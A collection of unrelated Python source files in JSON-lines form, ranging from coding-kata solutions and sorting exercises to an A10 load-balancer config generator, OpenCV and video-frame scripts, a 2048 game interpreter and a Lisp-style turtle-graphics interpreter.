[0,0,1,1,1,5,5,5,5,5,5,1,1,1,0,0]\r\n\r\nn = len(yf)\r\nyq 
= np.zeros(n)\r\n\r\nm = 1.5\r\ndi = 2\r\n\r\nfor i in range(di, n-di):\r\n if yf[i] == max(yf[i-di:i+di+1]):\r\n if yf[i] > m * np.mean(yf[i-di:i+di+1]):\r\n yq[i] = max(yf[i-di:i+di+1])\r\n\r\nplt.bar(range(n), yf, 0.5)\r\nplt.show()\r\nplt.bar(range(n), yq, 0.5)\r\nplt.show()\r\n\r\n\r\n#%%\r\n\r\nt = 19.5\r\ndt = 1.2\r\n\r\nN = int(dt * f)\r\n\r\nws = w[int(t*f):int(t*f)+N]\r\n#ws -= np.mean(ws)\r\n#ws /= max(abs(ws))\r\n\r\nplt.plot(ws)\r\n\r\n\r\n#%%\r\n\r\nq1 = np.array([])\r\nq2 = np.array([1,2,3])\r\n\r\nq1 = np.append(q1, q2, axis=0)\r\nq1 = np.append(q1, q2, axis=0)\r\nq1 = np.append(q1, q2, axis=0)\r\n \r\n\r\n#%%\r\n\r\nfrac = 10\r\nenv = np.zeros(N) + 1.0\r\nenv[:int(N/frac)] = np.linspace(0, 1, int(N/frac))\r\nenv[-int(N/frac):] = np.linspace(1, 0, int(N/frac))\r\nenv = env**0.1\r\n\r\nplt.plot(env)\r\n\r\n\r\n#%%\r\n\r\n#\r\n# End Of File\r\n#","repo_name":"johnamolloy/hello-world","sub_path":"_kata_04_WorkInProgress.py","file_name":"_kata_04_WorkInProgress.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6188733884","text":"import math\n\ndef cakes(recipe, available):\n isSubset = set(recipe).issubset(available)\n quantity = []\n\n if(isSubset):\n for requiredProduct, requiredNumber in recipe.items():\n for availableProduct, availableNumber in available.items():\n if requiredProduct == availableProduct:\n div = math.floor(availableNumber/requiredNumber)\n quantity.append(div)\n return min(quantity)\n else:\n return 0\n\nrecipe = {\"flour\": 500, \"sugar\": 200, \"eggs\": 1}\navailable = {\"flour\": 1200, \"sugar\": 1200, \"eggs\": 5, \"milk\": 200}\nprint(cakes(recipe, available))","repo_name":"tope96/codewars","sub_path":"src/pete_the_baker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10437892925","text":"import os\nimport re\n\nf5_file = open(os.path.normpath(\"python-scripts/A10-scripts/config-parts/GTM/LB788/LB788-service-ip.txt\"))\n\nnorm_file = str(f5_file.read()).split(\"# }\")\n\ndef remove_caractere(linha):\n caracteres = [\"\\n\",'\"',\" \",\"[\",\"]\",\"'\",\"#\"]\n for i in caracteres:\n linha = linha.replace(i,\"\")\n return linha\n\ndef altera_porta(linha):\n new_port =\"\"\n service_dict = {\n \"ftp\" : \"21\",\n \"interwise\" : \"7778\",\n \"webcache\" : \"8080\",\n \"http\": \"80\",\n \"https\":\"443\",\n \"tproxy\":\"8081\",\n \"smtp\":\"25\",\n \"afs3-prserver\":\"7002\",\n \"cbt\":\"7777\",\n \"any\":\"\",\n \"commplex-main\":\"5000\",\n \"sec-t4net-clt\":\"7778\",\n \"ndmp\":\"10000\",\n \"scp-config\":\"10001\",\n \"documentum\":\"10002\",\n \"irisa\":\"11000\",\n \"metasys\":\"11001\" \n }\n if linha in service_dict:\n new_port = service_dict[linha] \n else:\n new_port = linha\n return new_port \n\ndef get_info(file):\n nome_vs = file.split(\"{\")[0]\n if \"CEN\" in nome_vs:\n nome_vs = remove_caractere(nome_vs)\n nome_vs = str(nome_vs).split(\"/\")[2]\n nome_vs = f\"cen-{nome_vs}\"\n else:\n nome_vs = remove_caractere(nome_vs)\n nome_vs = str(nome_vs).split(\"/\")[2]\n nome_vs = f\"tsm-{nome_vs}\"\n ip_port = file.split(\"{\")[1]\n ip_port = list(filter(None,str(ip_port).split(\" \")))[2]\n ip = str(ip_port).split(\":\")[0]\n port = remove_caractere(str(ip_port).split(\":\")[1])\n port = altera_porta(port)\n \n \n return [nome_vs, ip, port]\n\n\n\n\n\ndef write_vIPs (vs_list, verifica_vs, vs_limpo):\n itens = 
get_info(vs_list)\n if itens[1] in verifica_vs:\n a10_vIP_input =\" \"\n else:\n if itens[2] == \"80\":\n a10_vIP_input = f\"gslb service-ip {itens[0]} {itens[1]}\\n port {itens[2]} tcp\\nport 443 tcp\\n!\" \n verifica_vs.append(itens[1])\n elif itens[2] == \"443\":\n a10_vIP_input = f\"gslb service-ip {itens[0]} {itens[1]}\\n port {itens[2]} tcp\\nport 80 tcp\\n!\" \n verifica_vs.append(itens[1])\n else:\n a10_vIP_input = f\"gslb service-ip {itens[0]} {itens[1]}\\n port {itens[2]} tcp\\n!\" \n verifica_vs.append(itens[1])\n vs_limpo.append(itens[0]) \n return a10_vIP_input\n\n\ndef write_site_slb(vs_list, cen_vs, tsm_vs):\n if \"cen-\" in vs_list:\n cen_vs.append(vs_list)\n else:\n tsm_vs.append(vs_list)\n \nverifica_vIPs = []\n\n\nvs_info = []\nfor lines in norm_file:\n print(write_vIPs(lines,verifica_vIPs,vs_info))\n \nprint(\"-------------------------------SITE-SLB------------------------\")\n\ncen_vs= []\ntsm_vs= []\nfor lines in vs_info:\n write_site_slb(lines, cen_vs, tsm_vs)\n\nline_server=\"\"\nstring_site=\"\"\nfor i in cen_vs:\n line_server = f\"{line_server}vip-server {i}\\n\"\n string_site = f\"gslb site CENESP\\n slb-dev SLB-CEN 192.168.15.200\\n {line_server}\"\nprint (string_site)\n\n\ntsm_line_server=\"\"\ntsm_string_site=\"\"\nfor i in tsm_vs:\n tsm_line_server = f\"{tsm_line_server}vip-server {i}\\n\"\n tsm_string_site = f\"gslb site TRANSAMERICA\\n slb-dev SLB-TSM 192.168.15.200\\n {tsm_line_server}\"\nprint (tsm_string_site)\n","repo_name":"RcostaFranca/python-scripts","sub_path":"A10-scripts/GTM-scripts/configServiceIP.py","file_name":"configServiceIP.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4219589390","text":"import cv2 as cv\r\n\r\ncapture=cv.VideoCapture(0)\r\n\r\ndef rescaleFrame(frame,scale=0.5): #will work for all: videos,images,live videos\r\n width=int(frame.shape[1]*scale)\r\n height=int(frame.shape[0]* scale)\r\n\r\n dimension=(width,height)\r\n\r\n return cv.resize(frame,dimension,interpolation=cv.INTER_AREA)\r\n\r\nwhile True:\r\n isTrue,frame=capture.read()\r\n rescaled_frame=rescaleFrame(frame)\r\n\r\n cv.imshow('Video',frame)\r\n cv.imshow('Rescaled Video',rescaled_frame)\r\n\r\n if cv.waitKey(20) and 0xFF==ord('d'):\r\n break\r\n\r\ncapture.release()\r\ncv.destroyAllWindows()\r\n","repo_name":"amitk29/OpenCV_tutorial_basics","sub_path":"rescale.py","file_name":"rescale.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23061532929","text":"# encoding:utf-8\nimport threading\nimport time\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self,name,age):\n super().__init__()\n self.name = name\n self.age = age\n\n def run(self):\n print(f\"Hi {self.name}, good day today, we love {self.age} you\")\n time.sleep(5)\n\n\n\n\nif __name__ == '__main__':\n t1 = MyThread('lzk','25')\n t2 = MyThread('lbq','25')\n t1.start()\n t2.start()\n print(threading.enumerate())","repo_name":"Lzk-1/Learning_materials","sub_path":"01Python编程/01进程线程协程/01代码/04test.py","file_name":"04test.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23583347321","text":"# Enter your code here. Read input from STDIN. 
Print output to STDOUT\n#!/usr/bin/env python\nimport sys\nimport random\nimport numpy as np\nfrom time import time\nimport math\n\n\ndef color(x):\n\tif x == 0:\n\t\treturn \"R\"\n\tif x == 1:\n\t\treturn \"O\"\n\tif x == 2:\n\t\treturn \"Y\"\n\tif x == 3:\n\t\treturn \"G\"\n\tif x == 4:\n\t\treturn \"B\"\n\tif x == 5:\n\t\treturn \"V\"\n\ndef repair(colors,N):\n\tif colors[0] != colors[N-1]:\n\t\treturn colors\n\ttofix = list(colors)\n\ttemp = tofix[N-2]\n\ttofix[N-2] = tofix[N-1]\n\ttofix[N-1] = temp\n\tcurrIndex = N-2\n\twhile currIndex > 1 and tofix[currIndex] == tofix[currIndex-1]:\n\t\ttemp = tofix[currIndex-2]\n\t\ttofix[currIndex-2] = tofix[currIndex-1]\n\t\ttofix[currIndex-1] = temp\n\t\tcurrIndex = currIndex-2\n\tfixedFlag = True\n\tfor i in range(N-1):\n\t\tif tofix[i] == tofix[i+1]:\n\t\t\tfixedFlag = False\n\tif tofix[0] == tofix[N-1]:\n\t\tfixedFlag = False\n\tif fixedFlag == True:\n\t\treturn(''.join(tofix))\n\telse:\n\t\treturn(\"IMPOSSIBLE\")\n\n\n\nT = int(raw_input().strip())\nfor n in range(T):\n\tcase = list(map(int,raw_input().strip().split(' ')))\n\tN = case[0]\n\ttoPlace = case[1:]\n\tprevColor = -1\n\toutput = \"\"\n\tbadFlag = False\n\tfor i in range(6):\n\t\tif toPlace[i] > N/2:\n\t\t\tbadFlag = True\n\tif badFlag == False:\n\t\tfor i in range(N):\n\t\t\tmaxIndex = -1\n\t\t\tfor k in range(6):\n\t\t\t\tif k != prevColor:\n\t\t\t\t\tif maxIndex < 0:\n\t\t\t\t\t\tmaxIndex = k\n\n\t\t\t\t\telif toPlace[k] > toPlace[maxIndex]:\n\t\t\t\t\t\tmaxIndex = k\n\t\t\toutput = output + color(maxIndex)\n\t\t\ttoPlace[maxIndex] -= 1\n\t\t\tprevColor = maxIndex\n\n\t\toutput = repair(str(output),N)\n\t\tprint(\"Case #\" + str(n+1) + \": \" + str(output))\n\telse:\n\t\tprint(\"Case #\" + str(n+1) + \": IMPOSSIBLE\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_207/452.py","file_name":"452.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6997487893","text":"import cv2 \nimport os\nimport time\nimport multiprocessing as mp\n\ndef read_video(video_path):\n video = cv2.VideoCapture(video_path)\n video_name = video_path.split('/')[-1][:-4]\n print(f'{video_name} are cpatured')\n \n if not os.path.exists(f'data/{video_name}'):\n os.mkdir(f'data/{video_name}')\n\n # frame \n currentframe = 0\n while(True): \n # reading from frame \n ret, frame = video.read()\n # ret代表成功與否(True 代表成功,False 代表失敗), frame 就是攝影機的單張畫面\n if ret: \n # if video is still left continue creating images \n frame_name = currentframe\n if frame_name < 10:\n name = f'./data/{video_name}/frame' + '000' + str(currentframe) + '.jpg'\n cv2.imwrite(name, frame) \n currentframe += 1\n elif frame_name < 100:\n name = f'./data/{video_name}/frame' + '00' + str(currentframe) + '.jpg'\n cv2.imwrite(name, frame) \n currentframe += 1\n elif frame_name < 1000:\n name = f'./data/{video_name}/frame' + '0' + str(currentframe) + '.jpg'\n cv2.imwrite(name, frame) \n currentframe += 1\n else:\n name = f'./data/{video_name}/frame' + str(currentframe) + '.jpg'\n cv2.imwrite(name, frame) \n currentframe += 1\n else: \n break\n \n # Release all space and windows once done \n video.release() \n cv2.destroyAllWindows() \n\nif __name__ == \"__main__\":\n start_time = time.time()\n video_par_path = '/home/rico-li/Job/豐興鋼鐵/high_quality_video'\n video_dirs = os.listdir(video_par_path)\n video_dirs = [os.path.join(video_par_path, video_dir) for video_dir in video_dirs if video_dir.split('/')[-1] != 
'.DS_Store']\n video_paths = [os.path.join(video_dir, video_path) for video_dir in video_dirs for video_path in os.listdir(video_dir)]\n video_count = len(video_paths)\n print(f'there are {video_count} videos')\n print(f'has {os.cpu_count()} cpus')\n \n try: \n if not os.path.exists('data'): \n os.makedirs('data')\n except OSError: \n print ('Error: Creating directory of data') \n\n video_idx = 0\n counts = video_count//os.cpu_count()\n left = video_count%os.cpu_count()\n now = video_count\n for _ in range(counts+1):\n processes = []\n if now >= os.cpu_count():\n for _ in range(os.cpu_count()):\n p = mp.Process(target=read_video, args=[video_paths[video_idx]])\n p.start()\n processes.append(p)\n video_idx += 1\n for process in processes:\n process.join()\n else:\n for _ in range(left):\n p = mp.Process(target=read_video, args=[video_paths[video_idx]])\n p.start()\n processes.append(p)\n video_idx += 1\n for process in processes:\n process.join()\n now -= os.cpu_count()\n print(f'\\n--- spend {time.time() - start_time:.2f} sec ---\\n')\n\n \n","repo_name":"RicoSuaveGuapo/yolact_curvature_detection","sub_path":"video2image.py","file_name":"video2image.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27314288426","text":"import game_funcs\nfrom collections import defaultdict\nimport sys\nimport numpy as np\n\nclass driver():\n def __init__(self):\n self.commands = [\"a\",\"w\",\"d\",\"s\"]\n self.init_matrix()\n self.curr=True\n self.names=np.array([[\"\" for _ in range(4)] for _ in range(4)],dtype='object')\n #print(self.names)\n # print(len(self.names))\n \n def init_matrix(self):\n self.matrix = game_funcs.start_game()\n\n def draw_matrix(self):\n print('Current Matrix is:')\n for i in range(4):\n for j in range(4):\n print(self.matrix[i][j],end=\" \")\n print(\"\")\n print(\"\")\n \n def key_press(self,key,op):\n if key in self.commands:\n # print(self.names)\n x=key\n if(x==\"w\" or x==\"W\"):\n self.matrix, move_made, sc,self.names= game_funcs.move_up(self.matrix,op,self.names)\n if(x==\"s\" or x==\"S\"):\n self.matrix, move_made, sc ,self.names = game_funcs.move_down(self.matrix,op,self.names)\n if(x==\"A\" or x==\"a\"):\n self.matrix, move_made, sc ,self.names= game_funcs.move_left(self.matrix,op,self.names)\n if(x==\"d\" or x==\"D\"):\n self.matrix, move_made, sc ,self.names= game_funcs.move_right(self.matrix,op,self.names)\n if move_made:\n self.matrix = game_funcs.add_new_tile(self.matrix)\n move_made = False\n # print(self.names)\n self.draw_matrix()\n \n def key_press_2(self,p,q,num):\n if p>3 or q>3:\n print(\"Out of Bounds\")\n return\n else:\n game_funcs.add_num_tile(self.matrix,p,q,num)\n print('Value added')\n self.draw_matrix()\n\n def key_press_3(self,p,q):\n if p>3 or q>3:\n print(\"Out of Bounds\")\n return\n print(game_funcs.what_value(self.matrix,p,q))\n\n def key_press_4(self,p,q,name):\n #print(p,q,name)\n self.names[p][q]=self.names[p][q]+name\n\nDriver=driver()\nDriver.draw_matrix()\n\nclass MyExecute:\n \n def __init__(self, tree, env):\n self.env = env\n self.bool=True\n if not any(0 in row for row in Driver.matrix) and not game_funcs.horizontal_move_exists(Driver.matrix) and not game_funcs.vertical_move_exists(Driver.matrix):\n Driver.draw_matrix()\n print(\"Game Over\")\n print(\"Thank you for playing the game\")\n exit()\n result = self.walkTree(tree)\n if self.bool==False:\n #print(\"It's true\")\n for i in range(4):\n for j in range(4):\n 
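The batching loop in the video2image.py record above hand-rolls chunks of `os.cpu_count()` processes with `counts`/`left`/`now` bookkeeping; `multiprocessing.Pool` expresses the same fan-out in a few lines. A sketch, assuming `read_video` is the worker defined in that record:

```python
import multiprocessing as mp

def read_video(path):
    # Stand-in for the frame-extraction worker in the record above.
    print('processing', path)

if __name__ == '__main__':
    video_paths = ['a.mp4', 'b.mp4', 'c.mp4']   # hypothetical paths
    # Pool keeps cpu_count() workers busy and joins them for us,
    # replacing the manual chunking arithmetic.
    with mp.Pool() as pool:
        pool.map(read_video, video_paths)
```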
print(Driver.matrix[i][j],end=\" \",file=sys.stderr)\n for i in range(4):\n for j in range(4):\n if len(Driver.names[i][j])!=0:\n g=str(i)\n f=str(j)\n h=''\n for m in range(len(Driver.names[i][j])):\n h=h+Driver.names[i][j][m]\n print(g+','+f+h,end=\" \",file=sys.stderr)\n print(\"\",file=sys.stderr)\n if result is not None and isinstance(result, int):\n print(result)\n if isinstance(result, str) and result[0] == '\"':\n print(result)\n # print(\"hey\")\n\n def walkTree(self, node):\n \n if isinstance(node, int):\n return node\n if isinstance(node, str):\n return node\n \n if node is None:\n return None\n \n if node[0] == 'num':\n return node[1]\n \n if node[0] == 'str':\n return node[1]\n \n if node[0] == 'add_up':\n Driver.key_press('w','+')\n if node[0] == 'add_down':\n Driver.key_press('s','+')\n if node[0] == 'add_left':\n Driver.key_press('a','+')\n if node[0] == 'add_right':\n Driver.key_press('d','+')\n if node[0] == 'sub_up':\n Driver.key_press('w','-')\n if node[0] == 'sub_down':\n Driver.key_press('s','-')\n if node[0] == 'sub_left':\n Driver.key_press('a','-')\n if node[0] == 'sub_right':\n Driver.key_press('d','-')\n if node[0] == 'mult_up':\n Driver.key_press('w','*')\n if node[0] == 'mult_down':\n Driver.key_press('s','*')\n if node[0] == 'mult_left':\n Driver.key_press('a','*')\n if node[0] == 'mult_right':\n Driver.key_press('d','*')\n if node[0] == 'div_up':\n print(\"hello\")\n Driver.key_press('w','/')\n if node[0] == 'div_down':\n print('hello2')\n Driver.key_press('s','/')\n if node[0] == 'div_left':\n print('hello3')\n Driver.key_press('a','/')\n if node[0] == 'div_right':\n print(hello4)\n Driver.key_press('d','/')\n if node[0] == 'var':\n Driver.key_press_4(node[2],node[3],node[1])\n if node[0] == 'assign':\n Driver.key_press_2(node[2],node[3],node[1])\n if node[0] == 'value':\n Driver.key_press_3(node[1],node[2])\n else:\n self.bool=False","repo_name":"Shanmukh45/2048-lexer-game","sub_path":"execute_2048.py","file_name":"execute_2048.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31833598846","text":"# Исходные данные:\nimport re\nimport random\nimport math\nfrom typing import List\n\nspisok_c = list(range(0, 1000000)) # список целых чисел\nprint(\"1.Cписок целых чисел от 0 до 999999:\", spisok_c)\n\n\n\nspisok_v = []\nfor i in range(99999):\n spisok_v.append(random.uniform(-1, 1)) # список вещественных чисел в диапазоне\nprint(\"2.Список из 99999 случайных вещественных чисел в диапазоне [-1, 1]:\", spisok_v)\n\nbirth_day = 24\nbirth_month = 11\nr = birth_day / birth_month\nspisok = [] # итоговый список\nbirth_day = 24\nbirth_month = 11\nr = birth_day / birth_month # радиус окружности\n\n\n\nfor i in range(56000):\n x = random.uniform(-r, r)\n y = random.uniform(-r, r)\n hypotenuse = math.sqrt(x ** 2 + y ** 2)\n if hypotenuse <= r:\n spisok.append(complex(x, y))\n if len(spisok) == 42000:\n break\nprint(\"3.42000 разных точки комплексной плоскости, лежащие на окружности радиуса:\", spisok)\n\nwith open(\"text.txt\", \"r\", encoding=\"utf8\") as file:\n text = file.read()\n text = re.sub(\"[^a-zA-Zа-яА-Я]\", \" \", text)\n words = text.split()\nprint(\"4.Отрывок из книги:\", words)\n\n\nsortirovka = [4, 10, 8, 2]\nprint(sortirovka)\n\n#4.Сортировка insertion sort\ndef insertionSort(spisok_c):\n for i in range(len(spisok_c)):\n current_value=spisok_c[i]\n position=i\n while position > 0 and spisok_c[position-1] > current_value:\n 
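The walkTree if-chain in the execute_2048.py record above maps every `<op>_<direction>` tag to a `Driver.key_press(key, symbol)` call, and its `div_right` branch even trips a NameError (`print(hello4)` with no quotes). A table-driven sketch of the same dispatch; the tag and key names follow that record:

```python
KEYS = {'up': 'w', 'down': 's', 'left': 'a', 'right': 'd'}
OPS = {'add': '+', 'sub': '-', 'mult': '*', 'div': '/'}

def dispatch(tag, key_press):
    # 'mult_left' -> key_press('a', '*'); unknown tags are simply ignored.
    op_name, _, direction = tag.partition('_')
    if op_name in OPS and direction in KEYS:
        key_press(KEYS[direction], OPS[op_name])

dispatch('div_right', lambda k, o: print('key_press', k, o))
```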
spisok_c[position]=spisok_c[position - 1]\n position -=1\n spisok_c[position]=current_value\n return spisok_c\n\nresult=insertionSort(spisok_c)\n\n\n# 10.Сортировка Quicksort\ndef quicksort(spisok_v):\n if len(spisok_v) <= 1:\n return spisok_v\n pivot = spisok_v[len(spisok_v) // 2]\n left = [x for x in spisok_v if x < pivot]\n middle = [x for x in spisok_v if x == pivot]\n right = [x for x in spisok_v if x > pivot]\n return quicksort(left) + middle + quicksort(right)\n\n#8. Сортировка selection sort\n\ndef selectionSort(arr):\n a = len(arr)\n for i in range(a):\n min = i\n for j in range(i+1, a):\n if abs(arr[j]) < abs(arr[min]):\n min = j\n arr[i], arr[min] = arr[min], arr[i]\n return arr\n\n# 2.Сортировка bubble sort\ndef bubble_sort(words):\n n = len(words)\n for w in range(n):\n for j in range(n - w - 1):\n if words[j] > words[j + 1]:\n words[j], words[j + 1] = words[j + 1], words[j] # Меняем элементы местами\n \nbubble_sort(words)\n\n\n\n\n\n\n\n\n\n\n\nprint(\"Отсортированный массив по insertionsort: \", result)\nprint(\"Отсортированный массив по Quicksort:\", quicksort(spisok_v))\nprint(\"Отсортированный массив по selection sort:\", selectionSort(spisok))\nprint(\"Отсортированный массив по bubble sort:\", ' '.join(words))\n\n\n","repo_name":"kit8nino/2023-python","sub_path":"ИС-33/Коротаев Александр/lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"21771774892","text":"from tinygrad.runtime.ops_gpu import CLDevice, CLProgram, compile_cl\n\nif __name__ == \"__main__\":\n dev = CLDevice()\n lib = compile_cl(\"\"\"\n#pragma OPENCL EXTENSION cl_khr_fp16 : enable\n__kernel void test(__global half *out, __global half *a, __global half *b) {\n int gid = get_global_id(0);\n out[gid] = max(a[gid], b[gid]);\n}\n\"\"\")\n prg = CLProgram(dev, \"test\", lib)\n\n","repo_name":"tinygrad/tinygrad","sub_path":"test/external/external_cl_half_max.py","file_name":"external_cl_half_max.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":20676,"dataset":"github-code","pt":"61"} +{"seq_id":"2720210229","text":"# From Peter Norvig's (How to Write a (Lisp) Interpreter (in Python))\n# https://norvig.com/lang.html\n# https://norvig.com/lis.py\nimport json\nimport logging\nimport math\nimport operator as op\nimport os\nimport random\nfrom datetime import datetime\n\nimport flatland.utils.config as CONFIG\nfrom flatland.library import check_internal_dir\nfrom flatland.utils.randomizer import GENERATE_NODEID\nfrom flatland.utils.randomizer import get_randomizer\n\nlogger = logging.getLogger(\"flatland.lang.primitives\")\n\n\ndef isconst(x):\n if isinstance(x, int) or isinstance(x, Number):\n return True\n return False\n\n\nclass Symbol(str):\n pass\n\n\nclass Number(float):\n pass\n\n\nclass List(list):\n def __str__(self):\n if len(self) == 0:\n return \"()\"\n else:\n ans = \"(\" + str(self[0])\n if len(self) > 1:\n ans += \" \"\n ans += \" \".join(str(x) for x in self[1:])\n ans += \")\"\n return ans\n\n\nclass Env(dict):\n \"An environment: a dict of {'var': val} pairs, with an outer Env.\"\n\n def __init__(self, parms=(), args=(), outer=None):\n self.update(zip(parms, args))\n self.outer = outer\n self.name = GENERATE_NODEID()\n\n def find(self, var):\n \"Find the innermost Env where var appears.\"\n if var in self:\n return self\n elif self.outer is not None:\n return self.outer.find(var)\n else:\n raise 
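The four sorts in the lab record above are easy to sanity-check against Python's built-in `sorted`; note the selection sort orders complex points by `abs()` (distance from the origin), so the reference comparison needs the same key. A small self-check sketch:

```python
import random

def selection_sort_abs(arr):
    # Same ordering rule as the lab's selection sort: minimum by abs().
    a = list(arr)
    for i in range(len(a)):
        m = min(range(i, len(a)), key=lambda j: abs(a[j]))
        a[i], a[m] = a[m], a[i]
    return a

pts = [complex(random.uniform(-1, 1), random.uniform(-1, 1)) for _ in range(50)]
assert [abs(z) for z in selection_sort_abs(pts)] == sorted(abs(z) for z in pts)
```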
AttributeError(f\"Unable to find {var}\")\n\n\nclass Procedure:\n \"A user-defined Scheme procedure.\"\n\n def __init__(self, parms, body, env):\n self.parms, self.body, self.env = parms, body, env\n\n def __call__(self, *args):\n return evalf(self.body, Env(self.parms, args, self.env))\n\n\nAtom = (Symbol, Number)\nExp = (Atom, List)\n\n\ndef validate_message(callmethod):\n def wrapper(self, data0):\n if data0.get(\"position\", None):\n CONFIG.TURTLE.moveto(data0[\"position\"])\n if data0.get(\"theta\", None) is not None:\n CONFIG.TURTLE.setheading(data0[\"theta\"])\n # python objects are by reference\n # but we need a copy of data to avoid overwrites\n # so copy the dictionary\n data = dict(**data0)\n return callmethod(self, data)\n return []\n\n return wrapper\n\n\nclass Node(Procedure):\n tp = \"\"\n\n def __init__(self, name, parent_env):\n super().__init__((), (), Env((), (), parent_env))\n self.name = name\n self.sources = []\n self.targets = {\"out\": []}\n\n def forward(self, outdata):\n outdata[\"position\"] = CONFIG.TURTLE.position()\n outdata[\"theta\"] = CONFIG.TURTLE.heading()\n results = []\n for i, nodename in enumerate(self.targets[\"out\"]):\n results.append((self.name, nodename, outdata))\n return results\n\n @validate_message\n def __call__(self, data):\n return self.forward(data)\n\n @property\n def id(self):\n return self.env.name\n\n @property\n def parameters(self):\n raise NotImplementedError()\n\n def to_dict(self):\n outer = self.env.outer\n return {\n \"name\": self.name,\n \"id\": self.env.name,\n \"type\": self.tp,\n \"scope\": outer.name,\n \"sources\": [outer[x].id for x in self.sources],\n \"targets\": {k: [outer[x].id for x in v] for k, v in self.targets.items()},\n }\n\n def __repr__(self):\n return json.dumps(self.to_dict(), indent=2)\n\n def __random_details__(self):\n raise NotImplementedError()\n\n\nclass LoopNode(Node):\n randomizer = get_randomizer(\"int\", [1, 360])\n tp = \"loop\"\n\n def __init__(self, name, varname, start, end, parent_env):\n super().__init__(name, parent_env)\n self.start = evalf(start, self.env)\n self.end = evalf(end, self.env)\n self.varname = varname\n self.resolved_name = f\"{self.env.name}:{self.varname}\"\n self.targets[\"body\"] = []\n\n if CONFIG.RANDOMIZE and CONFIG.RUN and parent_env.outer.name == \"__global__\":\n if isconst(end) and isconst(start):\n self.start = 0\n self.end = self.randomizer()\n end = self.end\n start = self.start\n logger.info(f\"randomizing end for {self.name}: {self.end}\")\n\n @property\n def parameters(self):\n return self.varname, self.start, self.end\n\n def forward(self, outdata):\n outdata[\"position\"] = CONFIG.TURTLE.position()\n outdata[\"theta\"] = CONFIG.TURTLE.heading()\n results = []\n in_loop = outdata[self.resolved_name] < self.end\n targets = self.targets[\"body\"] if in_loop else self.targets[\"out\"]\n if not in_loop:\n outdata.pop(self.resolved_name)\n for i, nodename in enumerate(targets):\n results.append((self.name, nodename, outdata))\n return results\n\n @validate_message\n def __call__(self, data):\n data[self.resolved_name] = data.get(self.resolved_name, self.start - 1)\n if data[self.resolved_name] < self.end:\n data[self.resolved_name] = data[self.resolved_name] + 1\n return self.forward(data)\n\n def to_dict(self):\n a = super().to_dict()\n a[\"params\"] = dict(start=self.start, end=self.end, varname=self.varname)\n return a\n\n def __random_details__(self):\n return {\n \"function\": self.tp,\n \"properties\": [\"start\", \"end\", \"varname\"],\n \"path\": None,\n 
\"rules\": {\"end\": self.randomizer.to_dict()},\n }\n\n\nclass MoveNode(Node):\n dist_randomizer = get_randomizer(\"float\", [0, 60])\n penup_randomizer = get_randomizer(\"bool\", 0.1)\n tp = \"move\"\n\n def __init__(self, name, dist, penup, parent_env):\n super().__init__(name, parent_env)\n self.dist = evalf(dist, self.env)\n self.penup = bool(evalf(penup, self.env))\n\n if CONFIG.RANDOMIZE and CONFIG.RUN and parent_env.outer.name == \"__global__\":\n if isconst(dist):\n self.dist = self.dist_randomizer()\n logger.info(f\"randomizing dist for {self.name}: {self.dist}\")\n dist = self.dist\n if isconst(penup):\n self.penup = self.penup_randomizer()\n logger.info(f\"randomizing penup for {self.name}: {self.penup}\")\n penup = self.penup\n\n @validate_message\n def __call__(self, data):\n if self.penup:\n CONFIG.TURTLE.penup()\n CONFIG.TURTLE.forward(self.dist)\n if self.penup:\n CONFIG.TURTLE.pendown()\n return self.forward(data)\n\n @property\n def parameters(self):\n return self.dist, int(self.penup)\n\n def to_dict(self):\n a = super().to_dict()\n a[\"params\"] = dict(dist=self.dist, penup=self.penup)\n return a\n\n def __random_details__(self):\n return {\n \"function\": self.tp,\n \"properties\": [\"dist\", \"penup\"],\n \"path\": None,\n \"rules\": {\n \"dist\": self.dist_randomizer.to_dict(),\n \"penup\": self.penup_randomizer.to_dict(),\n },\n }\n\n\nclass TurnNode(Node):\n randomizer = get_randomizer(\"int\", [0, 360])\n tp = \"turn\"\n\n def __init__(self, name, theta, parent_env):\n super().__init__(name, parent_env)\n self.theta = evalf(theta, self.env)\n if CONFIG.RANDOMIZE and CONFIG.RUN and parent_env.outer.name == \"__global__\":\n if isconst(theta):\n self.theta = self.randomizer()\n logger.info(\"randomizing theta for {self.name}: {self.theta}\")\n theta = self.theta\n\n @validate_message\n def __call__(self, data):\n CONFIG.TURTLE.left(self.theta)\n return self.forward(data)\n\n @property\n def parameters(self):\n return (self.theta,)\n\n def to_dict(self):\n a = super().to_dict()\n a[\"params\"] = dict(theta=self.theta)\n return a\n\n @classmethod\n def __random_details__(self):\n return {\n \"function\": self.tp,\n \"properties\": [\"theta\"],\n \"path\": None,\n \"rules\": {\"theta\": self.randomizer.to_dict()},\n }\n\n\nclass Flow(Node): # brain hurty\n tp = \"flow\"\n\n class Internal:\n def __init__(self, _id):\n self.entries = set()\n self.exits = dict()\n self.messages = dict()\n self.id = _id\n\n def add_entry(self, node):\n self.entries.add(node)\n\n def add_exit(self, node, port):\n if port not in self.exits:\n self.exits[port] = []\n self.messages[port] = []\n self.exits[port].append(node)\n\n def add_message(self, data, node):\n for port, names in self.exits.items():\n if node in names:\n 